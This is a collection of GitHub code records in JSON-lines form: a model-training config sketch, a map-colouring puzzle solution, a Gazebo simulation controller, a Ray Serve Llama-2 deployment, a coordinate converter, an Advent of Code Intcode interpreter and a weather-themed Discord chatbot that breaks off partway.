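A sketch of how the entry points above are wired together. Every config key is taken from how run_model and run_nbdt read their dicts, but the concrete values are assumptions:

import torch.nn as nn

data_cfg = {
    "dataDir": "data/snakes",  # must contain train_snakes_r1/ and valid_snakes_r1/ image folders
    "hierarchyModelPath": "data/snakes/model_states/best.pth",
    "hierarchyPath": "hierarchies/snakes",
    "hierarchyJSON": "graph-induced-densenet121.json",
    "wnidPath": "wnids/snakes.txt",
}
model_cfg = {
    "modelName": "densenet121",
    "batchSize": 32,
    "inputSize": 224,
    "featureExtract": "False",  # the code compares against the string "True"
    "lr": 1e-4,
    "nEpochs": 25,
}

criterion = nn.CrossEntropyLoss()
model, *history = run_model(data_cfg, model_cfg, criterion)
run_nbdt(data_cfg, model_cfg, loss_type="SoftTreeSupLoss")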
+{"seq_id":"74241585004","text":"# https://py.checkio.org/ru/mission/color-map/\n# my solution\n# not sure if it's the right solution\n\ndef color_map(region):\n n, m, graph, vertices = len(region), len(region[0]), dict(), set()\n for line in region:\n vertices = vertices | set(line)\n for vertex in vertices:\n graph[vertex] = set()\n\n def cell(row, col):\n return region[row][col] if 0 <= row < n and 0 <= col < m else None\n\n def add_edge(v1, v2):\n if v2 is not None and v1 != v2:\n graph[v1].add(v2)\n graph[v2].add(v1)\n\n for i in range(n):\n for j in range(m):\n vertex, right_neighbor, bottom_neighbor = region[i][j], cell(i, j + 1), cell(i + 1, j)\n add_edge(vertex, right_neighbor)\n add_edge(vertex, bottom_neighbor)\n\n def dfs(vert, clr):\n used.add(vert)\n if not colored_vertices[vert] and all((colored_vertices[neighbor] != clr for neighbor in graph[vert])):\n colored_vertices[vert] = clr\n for neighbor in graph[vert]:\n if neighbor not in used:\n dfs(neighbor, clr)\n\n colored_vertices = {vertex: None for vertex in vertices}\n for color in range(1, 5):\n used = set()\n for vertex in vertices:\n if not colored_vertices[vertex]:\n dfs(vertex, color)\n\n return list(colored_vertices.values())\n\n\ndef color_graph(g):\n def dfs(vert, clr):\n used.add(vert)\n if not colored_vertices[vert] and all((colored_vertices[neighbor] != clr for neighbor in g[vert])):\n colored_vertices[vert] = clr\n for neighbor in g[vert]:\n if neighbor not in used:\n dfs(neighbor, clr)\n\n colored_vertices = {vertex: None for vertex in g}\n for color in range(1, 5):\n used = set()\n for vertex in g:\n if not colored_vertices[vertex]:\n dfs(vertex, color)\n\n return list(colored_vertices.values())\n\n\n# best clear solution\n# https://py.checkio.org/mission/color-map/publications/DiZ/python-3/borders/?ordering=most_voted&filtering=all\ndef color_map_bc(colored_map):\n # Construct all regions\n regions = {}\n for i, line in enumerate(colored_map):\n for j, cell in enumerate(line):\n regions.setdefault(cell, set()).add(i + 1j * j)\n\n # Get neighbours for all regions\n neighbours = {}\n for region, cells in regions.items():\n border = set.union(*({c + 1j ** k for k in range(4)} for c in cells)) - cells\n neighbours[region] = {r for r, c in regions.items() if border & c}\n\n # Color each region with first available color\n c, colors = 0, [0] * len(regions)\n while c < len(regions):\n variants = set(range(colors[c] + 1, 5)) - {colors[n] for n in neighbours[c]}\n colors[c] = len(variants) and min(variants)\n c += 2 * bool(variants) - 1\n return colors\n\n\ndef test0():\n v_s = set()\n r = ((5, 2, 3, 1, 1, 1, 1, 1, 1),\n (0, 2, 2, 2, 2, 2, 2, 1, 4),\n (0, 2, 2, 2, 4, 4, 4, 4, 4),\n (0, 6, 6, 7, 8, 8, 8, 8, 8),\n (0, 7, 7, 7, 7, 8, 8, 8, 8))\n\n for rw in r:\n v_s = v_s | set(rw)\n\n print(v_s)\n print(color_map(r))\n\n\ndef test1():\n print(color_map(((0, 0, 0, 1, 4, 4, 4, 4, 4),\n (0, 1, 1, 1, 3, 3, 3, 3, 4),\n (0, 1, 1, 3, 3, 6, 5, 3, 4),\n (1, 1, 1, 3, 2, 6, 5, 5, 9),\n (1, 1, 1, 2, 2, 6, 6, 6, 9),\n (7, 8, 9, 9, 9, 9, 9, 9, 9),\n (7, 8, 8, 8, 8, 8, 8, 8, 8),\n (7, 7, 7, 7, 7, 7, 7, 7, 7))))\n\n regions = ((13, 13, 13, 13, 13, 13, 14, 14, 14, 14,),\n (13, 0, 0, 1, 1, 2, 2, 3, 3, 14,),\n (13, 4, 5, 5, 6, 6, 7, 7, 8, 14,),\n (13, 9, 9, 10, 10, 11, 11, 12, 12, 14,),\n (13, 13, 13, 13, 14, 14, 14, 14, 14, 14,),)\n print(color_map(regions))\n print('bc:', color_map_bc(regions))\n\n\ndef test3():\n g = {1: {2, 4, 5, 3, 13},\n 2: {1, 4, 7, 3},\n 3: {2, 7, 8, 11, 1},\n 4: {1, 2, 5, 6, 7},\n 5: {1, 4, 6, 12, 13, 11},\n 6: 
{5, 4, 7, 10, 12, 2},\n 7: {2, 3, 8, 10, 6, 4, 9},\n 8: {3, 9, 7, 11},\n 9: {8, 10, 11, 7},\n 10: {7, 9, 11, 12, 6},\n 11: {13, 12, 10, 9, 3, 5, 8},\n 12: {6, 5, 10, 11, 13},\n 13: {11, 12, 5, 1}}\n print('t3: ', color_graph(g))\n\n\nif __name__ == '__main__':\n test_funcs = [test0, test1, test3]\n for test in test_funcs:\n test()\n","repo_name":"diwert-ai/Problems","sub_path":"Problems/Checkio/Simple/color map.py","file_name":"color map.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"31165802282","text":"#!/usr/bin/env python3\n\nimport traceback\nfrom typing import List\nfrom typing import Tuple\nfrom typing import Dict\nimport time\nimport gazebo_msgs\nimport gazebo_msgs.srv\nimport rosgraph_msgs\n\nimport rospy\nfrom std_srvs.srv import Empty\n\nfrom lr_gym.envControllers.RosEnvController import RosEnvController\nfrom lr_gym.envControllers.JointEffortEnvController import JointEffortEnvController\nfrom lr_gym.envControllers.SimulatedEnvController import SimulatedEnvController \nfrom lr_gym.utils.utils import JointState, LinkState, RequestFailError\nimport os\nimport lr_gym.utils.dbg.ggLog as ggLog\nfrom lr_gym.utils.utils import Pose\nfrom lr_gym.utils.gazebo_models_manager import delete_model, spawn_model\n\n\nclass GazeboControllerNoPlugin(RosEnvController, JointEffortEnvController, SimulatedEnvController):\n \"\"\"This class allows to control the execution of a Gazebo simulation.\n\n It only uses the default gazebo plugins which are usually included in the installation.\n Because of this the duration of the simulation steps may not be accurate and simulation\n speed is low due to communication overhead.\n \"\"\"\n\n def __init__( self,\n usePersistentConnections : bool = False,\n stepLength_sec : float = 0.001,\n rosMasterUri : str = None):\n \"\"\"Initialize the Gazebo controller.\n\n Parameters\n ----------\n usePersistentConnections : bool\n Controls wheter to use persistent connections for the gazebo services.\n IMPORTANT: enabling this seems to create problems with the synchronization\n of the service calls. This breaks the pause/unpause/reset order and\n leads to deadlocks\n In theory it should have been fine as long as there are no connection\n problems and gazebo does not restart.\n\n Raises\n -------\n ROSException\n If it fails to find the gazebo services\n\n \"\"\"\n super().__init__()\n\n self._stepLength_sec = stepLength_sec\n self._lastUnpausedTime = 0\n self._episodeIntendedSimDuration = 0\n self._episodeWallStartTime = 0\n self._totalRenderTime = 0\n self._stepsTaken = 0\n\n self._lastStepRendered = None\n self._lastRenderResult = None\n self._usePersistentConnections = usePersistentConnections\n\n self._rosMasterUri = rosMasterUri\n\n def _makeRosConnections(self):\n serviceNames = {\"applyJointEffort\" : \"/gazebo/apply_joint_effort\",\n \"clearJointEffort\" : \"/gazebo/clear_joint_forces\",\n \"getJointProperties\" : \"/gazebo/get_joint_properties\",\n \"getLinkState\" : \"/gazebo/get_link_state\",\n \"pause\" : \"/gazebo/pause_physics\",\n \"unpause\" : \"/gazebo/unpause_physics\",\n \"get_physics_properties\" : \"/gazebo/get_physics_properties\",\n \"reset\" : \"/gazebo/reset_simulation\",\n \"setLinkState\" : \"/gazebo/set_link_state\",\n \"setLightProperties\" : \"/gazebo/set_light_properties\"}\n\n timeout_secs = 30.0\n for serviceName in serviceNames.values():\n try:\n rospy.loginfo(\"waiting for service \"+serviceName+\" ...\")\n rospy.wait_for_service(serviceName)\n rospy.loginfo(\"got service \"+serviceName)\n except rospy.ROSException as e:\n rospy.logfatal(\"Failed to wait for service \"+serviceName+\". Timeouts were \"+str(timeout_secs)+\"s. Exception = \"+str(e))\n raise\n except rospy.ROSInterruptException as e:\n rospy.logfatal(\"Interrupeted while waiting for service \"+serviceName+\". 
Exception = \"+str(e))\n raise\n\n self._applyJointEffortService = rospy.ServiceProxy(serviceNames[\"applyJointEffort\"], gazebo_msgs.srv.ApplyJointEffort, persistent=self._usePersistentConnections)\n self._clearJointEffortService = rospy.ServiceProxy(serviceNames[\"clearJointEffort\"], gazebo_msgs.srv.JointRequest, persistent=self._usePersistentConnections)\n self._getJointPropertiesService = rospy.ServiceProxy(serviceNames[\"getJointProperties\"], gazebo_msgs.srv.GetJointProperties, persistent=self._usePersistentConnections)\n self._getLinkStateService = rospy.ServiceProxy(serviceNames[\"getLinkState\"], gazebo_msgs.srv.GetLinkState, persistent=self._usePersistentConnections)\n self._pauseGazeboService = rospy.ServiceProxy(serviceNames[\"pause\"], Empty, persistent=self._usePersistentConnections)\n self._unpauseGazeboService = rospy.ServiceProxy(serviceNames[\"unpause\"], Empty, persistent=self._usePersistentConnections)\n self._getPhysicsProperties = rospy.ServiceProxy(serviceNames[\"get_physics_properties\"], gazebo_msgs.srv.GetPhysicsProperties, persistent=self._usePersistentConnections)\n self._resetGazeboService = rospy.ServiceProxy(serviceNames[\"reset\"], Empty, persistent=self._usePersistentConnections)\n self._setLinkStateService = rospy.ServiceProxy(serviceNames[\"setLinkState\"], gazebo_msgs.srv.SetLinkState, persistent=self._usePersistentConnections)\n self._setLightPropertiesService = rospy.ServiceProxy(serviceNames[\"setLightProperties\"], gazebo_msgs.srv.SetLightProperties, persistent=self._usePersistentConnections)\n\n #self._setGazeboPhysics = rospy.ServiceProxy(self._setGazeboPhysics, SetPhysicsProperties, persistent=self._usePersistentConnections)\n\n # Crete a publisher to manually send clock messages (used in reset, very ugly, sorry)\n self._clockPublisher = rospy.Publisher(\"/clock\", rosgraph_msgs.msg.Clock, queue_size=1)\n\n\n def startController(self):\n \"\"\"Start up the controller. This must be called after setCamerasToObserve, setLinksToObserve and setJointsToObserve.\"\"\"\n\n super().startController()\n\n self._makeRosConnections()\n\n\n rospy.loginfo(\"ROS time is \"+str(rospy.get_time())+\" pid = \"+str(os.getpid()))\n self.pauseSimulation()\n self.resetWorld()\n\n def _callService(self,serviceProxy : rospy.ServiceProxy) -> bool:\n \"\"\"Call the provided service. It retries in case of failure and handles exceptions. 
Returns false if the call failed.\n\n Parameters\n ----------\n serviceProxy : rospy.ServiceProxy\n ServiceProxy for the service to be called\n\n Returns\n -------\n bool\n True if the service was called, false otherwise\n\n \"\"\"\n done = False\n counter = 0\n maxRetry = 10\n while not done and not rospy.is_shutdown():\n if counter < maxRetry:\n try:\n serviceProxy.call()\n done = True\n except rospy.ServiceException as e:\n rospy.logerr(\"Service \"+serviceProxy.resolved_name+\", call failed: \"+traceback.format_exc())\n except rospy.ROSInterruptException as e:\n rospy.logerr(\"Service \"+serviceProxy.resolved_name+\", call interrupted: \"+traceback.format_exc())\n counter+=maxRetry #don't retry\n except rospy.ROSSerializationException as e:\n rospy.logerr(\"Service \"+serviceProxy.resolved_name+\", call failed to serialize: \"+traceback.format_exc())\n counter += 1\n else:\n rospy.logerr(\"Failed to call service\")\n break\n return done\n\n def pauseSimulation(self) -> bool:\n \"\"\"Pause the simulation.\n\n Returns\n -------\n bool\n True if the simulation was paused, false in case of failure\n\n \"\"\"\n ret = self._callService(self._pauseGazeboService)\n #rospy.loginfo(\"paused sim\")\n self._lastUnpausedTime = rospy.get_time()\n return ret\n\n def unpauseSimulation(self) -> bool:\n \"\"\"Unpause the simulation.\n\n Returns\n -------\n bool\n True if the simulation was unpaused, false in case of failure\n\n \"\"\"\n t = rospy.get_time()\n if self._lastUnpausedTime>t:\n rospy.logwarn(\"Simulation time decreased since last pause! (time diff = \"+str(t-self._lastUnpausedTime)+\"s)\")\n ret = self._callService(self._unpauseGazeboService)\n #rospy.loginfo(\"unpaused sim\")\n return ret\n\n def isPaused(self):\n return self._getPhysicsProperties.call().pause\n \n def resetWorld(self) -> bool:\n \"\"\"Reset the world to its initial state.\n\n Returns\n -------\n bool\n True if the world was reset, false in case of failure\n\n \"\"\"\n self.pauseSimulation()\n totalEpSimDuration = self.getEnvSimTimeFromStart()\n\n ret = self._callService(self._resetGazeboService)\n\n self._lastUnpausedTime = 0\n\n # ggLog.info(f\"totalEpSimDuration = {totalEpSimDuration}\")\n # ggLog.info(f\"self._episodeIntendedSimDuration = {self._episodeIntendedSimDuration}\")\n totalSimTimeError = totalEpSimDuration - self._episodeIntendedSimDuration\n if abs(totalSimTimeError)>=0.1:\n rospy.logwarn(\"Episode error in simulation time keeping = \"+str(totalSimTimeError)+\"s (This is just an upper bound, may actually be fine)\")\n\n # totalEpRealDuration = time.time() - self._episodeWallStartTime\n # if self._episodeRealSimDuration!=0:\n # ratio = float(totalEpSimDuration)/self._episodeRealSimDuration\n # else:\n # ratio = -1\n # if totalEpRealDuration!=0:\n # totalRatio = float(totalEpSimDuration)/totalEpRealDuration\n # else:\n # totalRatio = -1\n # if totalEpSimDuration!=0:\n # rospy.loginfo( \"Duration: sim={:.3f}\".format(totalEpSimDuration)+\n # \" real={:.3f}\".format(totalEpRealDuration)+\n # \" sim/real={:.3f}\".format(totalRatio)+ # Achieved sim/real time ratio\n # \" step-time-only ratio ={:.3f}\".format(ratio)+ #This would be the sim/real time ratio if there was no overhead for sending actions and getting observations\n # \" totalRenderTime={:.4f}\".format(self._totalRenderTime)+\n # \" realFps={:.2f}\".format(self._stepsTaken/totalEpRealDuration)+\n # \" simFps={:.2f}\".format(self._stepsTaken/totalEpSimDuration))\n self._episodeIntendedSimDuration = 0\n self._episodeWallStartTime = time.time()\n 
self._totalRenderTime = 0\n self._stepsTaken = 0\n\n # Reset the time manually. Incredibly ugly, incredibly effective\n t = rosgraph_msgs.msg.Clock()\n self._clockPublisher.publish(t)\n\n\n\n #rospy.loginfo(\"resetted sim\")\n return ret\n\n\n def step(self) -> float:\n \"\"\"Run the simulation for one step of self._stepLength_sec seconds.\n\n It unpauses the simulation, sleeps and then pauses it back. It may not be precise.\n\n Returns\n -------\n float\n The intended duration of the step, in seconds\n\n \"\"\"\n\n t0_real = time.time()\n t0 = rospy.get_time()\n self.unpauseSimulation()\n t1 = rospy.get_time()\n rospy.sleep(self._stepLength_sec)\n t2 = rospy.get_time()\n self.pauseSimulation()\n t3 = rospy.get_time()\n tf_real = time.time()\n self._episodeIntendedSimDuration += t3 - t0\n rospy.loginfo(\"t0 = \"+str(t0)+\" t3 = \"+str(t3))\n rospy.loginfo(\"Unpaused for a duration between \"+str(t2-t1)+\"s and \"+str(t3-t0)+\"s\")\n\n self._stepsTaken+=1\n\n return self._stepLength_sec\n\n\n\n\n def setJointsEffortCommand(self, jointTorques : List[Tuple[str,str,float]]) -> None:\n for command in jointTorques:\n jointName = command[1]\n torque = command[2]\n duration_secs = self._stepLength_sec\n secs = int(duration_secs)\n nsecs = int((duration_secs - secs) * 1000000000)\n\n request = gazebo_msgs.srv.ApplyJointEffortRequest()\n request.joint_name = jointName\n request.effort = torque\n request.duration.secs = secs\n request.duration.nsecs = nsecs\n res = self._applyJointEffortService.call(request)\n if not res.success:\n rospy.logerr(\"Failed applying effort for joint \"+jointName+\": \"+res.status_message)\n\n\n def getJointsState(self, requestedJoints : List[Tuple[str,str]]) -> Dict[Tuple[str,str],JointState]:\n #ggLog.info(\"GazeboControllerNoPlugin.getJointsState() called\")\n gottenJoints = {}\n missingJoints = []\n for joint in requestedJoints:\n jointName = joint[1]\n modelName = joint[0]\n\n gotit = False\n tries = 0\n while not gotit and tries <10:\n jointProp = self._getJointPropertiesService.call(jointName) ## TODO: this ignores the model name!\n #ggLog.info(\"Got joint prop for \"+jointName+\" = \"+str(jointProp))\n gotit = jointProp.success\n tries+=1\n if gotit:\n jointState = JointState(list(jointProp.position), list(jointProp.rate), None) #NOTE: effort is not returned by the gazebo service\n gottenJoints[(modelName,jointName)] = jointState\n else:\n missingJoints.append(joint)\n # err = \"GazeboControllerNoPlugin: Failed to get state for joint '\"+str(jointName)+\"' of model '\"+str(modelName)+\"'\"\n # ggLog.error(err)\n # raise RuntimeError(err)\n\n if len(missingJoints)>0:\n err = f\"Failed to get state for joints {missingJoints}. 
requested {requestedJoints}\"\n # rospy.logerr(err)\n raise RequestFailError(message=err, partialResult=gottenJoints)\n\n\n return gottenJoints\n\n\n\n def getLinksState(self, requestedLinks : List[Tuple[str,str]]) -> Dict[Tuple[str,str],LinkState]:\n gottenLinks = {}\n missingLinks = []\n for link in requestedLinks:\n linkName = link[0]+\"::\"+link[1]\n resp = self._getLinkStateService.call(link_name=linkName)\n\n if resp.success:\n linkState = LinkState( position_xyz = (resp.link_state.pose.position.x, resp.link_state.pose.position.y, resp.link_state.pose.position.z),\n orientation_xyzw = (resp.link_state.pose.orientation.x, resp.link_state.pose.orientation.y, resp.link_state.pose.orientation.z, resp.link_state.pose.orientation.w),\n pos_velocity_xyz = (resp.link_state.twist.linear.x, resp.link_state.twist.linear.y, resp.link_state.twist.linear.z),\n ang_velocity_xyz = (resp.link_state.twist.angular.x, resp.link_state.twist.angular.y, resp.link_state.twist.angular.z))\n\n gottenLinks[link] = linkState\n else:\n # err = f\"Failed to get Link state for link {linkName}: resp = {resp}\"\n # ggLog.warn(err)\n # world_props = rospy.ServiceProxy(\"/gazebo/get_world_properties\", gazebo_msgs.srv.GetWorldProperties)()\n # ggLog.error(f\"World properties are: {world_props}\")\n # model_props = rospy.ServiceProxy(\"/gazebo/get_model_properties\", gazebo_msgs.srv.GetModelProperties)(model_name=link[0])\n # ggLog.error(f\"Model '{link[0]}' properties are: {model_props}\")\n missingLinks.append(link) \n \n if len(missingLinks)>0:\n err = f\"Failed to get state for links {missingLinks}. requested {requestedLinks}\"\n # rospy.logerr(err)\n raise RequestFailError(message=err, partialResult=gottenLinks)\n \n return gottenLinks\n\n def getEnvSimTimeFromStart(self) -> float:\n return rospy.get_time()\n\n\n def setRosMasterUri(self, rosMasterUri : str):\n self._rosMasterUri = rosMasterUri\n\n def spawnModel(self, xacro_file_path : str,\n pose : Pose = Pose(0,0,0,0,0,0,1), \n args : Dict[str,str] = {}, \n model_name = \"model\", \n robot_namespace = \"\", \n reference_frame = \"world\",\n format = \"urdf\"):\n \"\"\"Spawn a model in the environment, arguments depend on the type of SimulatedEnvController\n \"\"\"\n spawn_model(xacro_file_path = xacro_file_path,\n pose = pose, \n args = args, \n model_name = model_name, \n robot_namespace = robot_namespace, \n reference_frame = reference_frame,\n format = format)\n\n\n def deleteModel(self, model : str):\n \"\"\"Delete a model from the environment\"\"\"\n delete_model(model_name=model)\n\n\n def setJointsStateDirect(self, jointStates : Dict[Tuple[str,str],JointState]):\n \"\"\"Set the state for a set of joints\n\n Parameters\n ----------\n jointStates : Dict[Tuple[str,str],JointState]\n Keys are in the format (model_name, joint_name), the value is the joint state to enforce\n \"\"\"\n raise NotImplementedError()\n \n\n def setLinksStateDirect(self, linksStates : Dict[Tuple[str,str],LinkState]):\n \"\"\"Set the state for a set of links\n\n Parameters\n ----------\n linksStates : Dict[Tuple[str,str],LinkState]\n Keys are in the format (model_name, link_name), the value is the link state to enforce\n \"\"\"\n \n ret = {}\n for item in linksStates.items():\n linkName = item[0][1]\n modelName = item[0][0]\n linkState = item[1]\n req = gazebo_msgs.srv.SetLinkStateRequest()\n req.link_state = gazebo_msgs.msg.LinkState()\n req.link_state.link_name = modelName+\"::\"+linkName\n req.link_state.reference_frame = \"world\"\n req.link_state.pose = 
linkState.pose.getPoseStamped(frame_id = \"world\").pose\n req.link_state.twist.linear.x = linkState.pos_velocity_xyz[0]\n req.link_state.twist.linear.y = linkState.pos_velocity_xyz[1]\n req.link_state.twist.linear.z = linkState.pos_velocity_xyz[2]\n req.link_state.twist.angular.x = linkState.ang_velocity_xyz[0]\n req.link_state.twist.angular.y = linkState.ang_velocity_xyz[1]\n req.link_state.twist.angular.z = linkState.ang_velocity_xyz[2]\n\n #print(req)\n #print(type(req))\n resp = self._setLinkStateService(req)\n \n if not resp.success:\n ggLog.error(\"Failed setting link state for link \"+modelName+\"::\"+linkName+\": \"+resp.status_message)\n # else:\n # ggLog.info(\"Successfully set Linkstate for link \"+modelName+\"::\"+linkName)\n return ret\n\n def freerun(self, duration_sec : float):\n wasPaused = self.isPaused()\n if wasPaused:\n self.unpauseSimulation()\n rospy.sleep(duration_sec)\n if wasPaused:\n self.pauseSimulation()\n\n \n def setupLight(self, gz_req : gazebo_msgs.srv.SetLightPropertiesRequest):\n res = self._setLightPropertiesService.call(gz_req)\n if not res.success:\n ggLog.error(f\"GazeboControllerNoPlugin: failed to setup Light.\\n req = {gz_req}\\n res={res}\")\n return False\n return True","repo_name":"c-rizz/lr_gym","sub_path":"lr_gym/src/lr_gym/envControllers/GazeboControllerNoPlugin.py","file_name":"GazeboControllerNoPlugin.py","file_ext":"py","file_size_in_byte":19753,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
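A sketch of driving the controller above from a ROS node; it assumes a running Gazebo instance exposing the default /gazebo/* services, and the model/joint names are made up:

import rospy

rospy.init_node("gazebo_stepper")

controller = GazeboControllerNoPlugin(stepLength_sec=0.001)
controller.startController()  # waits for the services, then pauses and resets the world

# Apply 0.5 Nm to a hypothetical joint for one step, then read the state back.
controller.setJointsEffortCommand([("my_robot", "joint1", 0.5)])
controller.step()
print(controller.getJointsState([("my_robot", "joint1")]))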
+{"seq_id":"71459097643","text":"# from transformers import AutoTokenizer\nmodel_name = \"michaelfeil/ct2fast-Llama-2-7b-hf\"\n\nfrom hf_hub_ctranslate2 import GeneratorCT2fromHfHub\nimport requests\nfrom starlette.requests import Request\nfrom typing import Dict\n\nfrom ray import serve\n\n@serve.deployment(route_prefix=\"/serve/llama7b\")\nclass Llama7BDeployment:\n def __init__(self):\n self.model = GeneratorCT2fromHfHub(\n model_name_or_path=model_name,\n device=\"cpu\",\n compute_type=\"int8\",\n )\n\n async def __call__(self, request: Request) -> Dict:\n # Extracting the message from the request's JSON body\n json_data = await request.json()\n message = json_data.get(\"message\", \"\")\n\n outputs = self.model.generate(\n text=[message],\n max_length=128,\n include_prompt_in_result=False\n )\n \n # I noticed you returned {\"result\": self._msg} which would cause an error since self._msg is not defined.\n # Assuming you want to return the generated outputs:\n return {\"result\": outputs}\n\napp = Llama7BDeployment.bind()\n\n# 2: Deploy the application locally.\nserve.run(app)\n\nimport requests\n\n# Define the URL for the endpoint\nurl = \"http://localhost:8000/serve/llama7b\"\n\n# Define the payload\ndata = {\n \"message\": \"Your input text here\"\n}\n\n# Send a POST request\nresponse = requests.post(url, json=data)\n\n# Print the response\nprint(response.json())\n\n","repo_name":"JinL0/ray-serve-llama","sub_path":"llama2_7b.py","file_name":"llama2_7b.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"28170118824","text":"import StringUtilities\n\nclass CoordinatesService:\n a = 1\n\ndef DMSToDecimalDegrees(DMSString):\n if(StringUtilities.isBlank(DMSString)):\n return \"\"\n\n values = DMSString.split(\" \")\n seconds, direction = values[2][0:len(values[2]) - 1], values[2][-1]\n TheLatitudeValue = float(values[0]) + ((float(values[1])) / 60) + ((float(seconds)) / 3600)\n\n if (direction == \"W\" or direction == \"S\"):\n TheLatitudeValue = 0 - TheLatitudeValue\n\n return TheLatitudeValue","repo_name":"UdaySaiTyada/GeoSpatialRendering","sub_path":"CoordinatesService.py","file_name":"CoordinatesService.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"26729174693","text":"def make_operation (input):\n opcode = \"\"\n param1Mode = False\n param2Mode = False\n param3Mode = False\n\n parsed = list(str(input))\n parsed.reverse()\n\n idx = 0\n while idx < len(parsed):\n comp = parsed[idx]\n if idx == 0:\n opcode = comp\n elif idx == 1:\n opcode = comp + opcode\n elif idx == 2:\n if comp == \"1\":\n param1Mode = True\n elif idx == 3:\n if comp == \"1\":\n param2Mode = True\n elif idx == 4:\n if comp == \"1\":\n param3Mode = True\n idx +=1\n\n\n return [int(opcode), param1Mode, param2Mode, param3Mode]\n\ndef get_value (input, index, mode):\n if mode == False:\n return instructions[index]\n else:\n return index\n\ndef get_dest (input, index, mode):\n return index\n\ninstructions = []\n\nwith open('input.txt', 'r') as file:\n data = file.read()\n instructions = list(map(int, data.split(\",\")))\n\n# 1 - Add next two integers together, store in 3rd\n# 2 - Multiply two integers together, store in 3rd\n# 3 - Store input at address\n# 4 - Output value at address\n# 99 - End\n\ninput = 1\noutput = 0\n\nidx = 0\n\nprint(\"Have instructions\", len(instructions))\n\n# instructions[1] = 12\n# instructions[2] = 2\n\n\n\nwhile idx < len(instructions):\n raw = instructions[idx]\n print(\"Raw {}\".format(raw))\n\n operation = make_operation(raw)\n\n val = operation[0]\n param1Mode = operation[1]\n param2Mode = operation[2]\n param3Mode = operation[3]\n\n if val == 1:\n sl = instructions[idx + 1: idx + 4]\n print(\"Add slice {}\".format(sl))\n # print(\"Slice\", sl)\n # print(instructions[idx:idx+10])\n p1 = get_value(instructions, sl[0], param1Mode)\n p2 = get_value(instructions, sl[1], param2Mode)\n newval = p1 + p2\n # dest = sl[2]\n dest = get_dest(instructions, sl[2], param3Mode)\n instructions[dest] = newval\n idx += 4\n elif val == 2:\n sl = instructions[idx + 1: idx + 4]\n print(\"Mul slice {}\".format(sl))\n p1 = get_value(instructions, sl[0], param1Mode)\n p2 = get_value(instructions, sl[1], param2Mode)\n newval = p1 * p2\n # dest = sl[2]\n dest = get_dest(instructions, sl[2], param3Mode)\n instructions[dest] = newval\n idx += 4\n elif val == 3:\n dest = get_dest(instructions, instructions[idx+1], param1Mode)\n instructions[dest] = input\n print(\"Input set {} to value {}\".format(dest, input))\n idx += 2\n elif val == 4:\n val = instructions[idx+1] if param1Mode else instructions[instructions[idx+1]]\n output = val\n print(\"Output set {} to value {}\".format(dest, output))\n\n idx += 2\n else:\n print(\"Breaking at val {}\".format(val))\n break\n\nprint (\"Diagnostic code \", output)\n\n\n ","repo_name":"chedabob/adventofcode-2019","sub_path":"day5/day5p1.py","file_name":"day5p1.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"34158217537","text":"import discord\r\nimport time\r\nimport os\r\nimport requests\r\nfrom discord.ext import commands\r\nimport openai\r\nfrom dotenv import load_dotenv \r\nload_dotenv()\r\n\r\nTOKEN = os.getenv('DISCORD_TOKEN')\r\nAPI_KEY = os.getenv('API_KEY')\r\napi_endpoint = 'http://dataservice.accuweather.com/forecasts/v1/daily/1day/331243?apikey=' + API_KEY\r\n# Initialize variables for chat history\r\nexplicit_input = \"\"\r\nchatgpt_output = 'Chat log: /n'\r\ncwd = os.getcwd()\r\ni = 1\r\n\r\n# Find an available chat history file\r\nwhile os.path.exists(os.path.join(cwd, f'chat_history{i}.txt')):\r\n i += 1\r\n\r\nhistory_file = os.path.join(cwd, f'chat_history{i}.txt')\r\n\r\n# Create a new chat history file\r\nwith open(history_file, 'w') as f:\r\n f.write('\\n')\r\n\r\n# Initialize chat history\r\nchat_history = ''\r\n\r\n#api\r\ndata = ''\r\nresponse = requests.get(api_endpoint)\r\nif response.status_code == 200:\r\n data = response.json()\r\n print(data)\r\nelse:\r\n print(f\"Error: {response.status_code}\")\r\n\r\n#OPEN AI STUFF\r\n#Put your key in the .env File and grab it here\r\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\r\n\r\nname = 'Flint Lockwood'\r\n\r\nrole = 'meteorologist'\r\n# Define the impersonated role with instructions\r\nimpersonated_role = f\"\"\"\r\n From now on, you are going to act as {name}. Your role is {role}. You must act like we are in the cloudy with a chance of meatballs world.\r\n When it rains, you must act like it is raining meatballs. Use the weather given from this JSON {data}.\"\"\"\r\n\r\n# Function to complete chat input using OpenAI's GPT-3.5 Turbo\r\ndef chatcompletion(user_input, impersonated_role, explicit_input, chat_history):\r\n output = openai.ChatCompletion.create(\r\n model=\"gpt-3.5-turbo-0301\",\r\n temperature=1,\r\n presence_penalty=0,\r\n frequency_penalty=0,\r\n max_tokens=2000,\r\n messages=[\r\n {\"role\": \"system\", \"content\": f\"{impersonated_role}. Conversation history: {chat_history}\"},\r\n {\"role\": \"user\", \"content\": f\"{user_input}. {explicit_input}\"},\r\n ]\r\n )\r\n\r\n for item in output['choices']:\r\n chatgpt_output = item['message']['content']\r\n\r\n return chatgpt_output\r\n\r\n# Function to handle user chat input\r\ndef chat(user_input):\r\n global chat_history, name, chatgpt_output\r\n current_day = time.strftime(\"%d/%m\", time.localtime())\r\n current_time = time.strftime(\"%H:%M:%S\", time.localtime())\r\n chat_history += f'\\nUser: {user_input}\\n'\r\n chatgpt_raw_output = chatcompletion(user_input, impersonated_role, explicit_input, chat_history).replace(f'{name}:', '')\r\n chatgpt_output = f'{name}: {chatgpt_raw_output}'\r\n chat_history += chatgpt_output + '\\n'\r\n with open(history_file, 'a') as f:\r\n f.write('\\n'+ current_day+ ' '+ current_time+ ' User: ' +user_input +' \\n' + current_day+ ' ' + current_time+ ' ' + chatgpt_output + '\\n')\r\n f.close()\r\n return chatgpt_raw_output\r\n\r\n\r\n#DISCORD STUFF\r\nintents = discord.Intents().all()\r\nclient = commands.Bot(command_prefix=\"!\", intents=intents)\r\n#Set up your commands to grab them.\r\n\r\n@client.event\r\nasync def 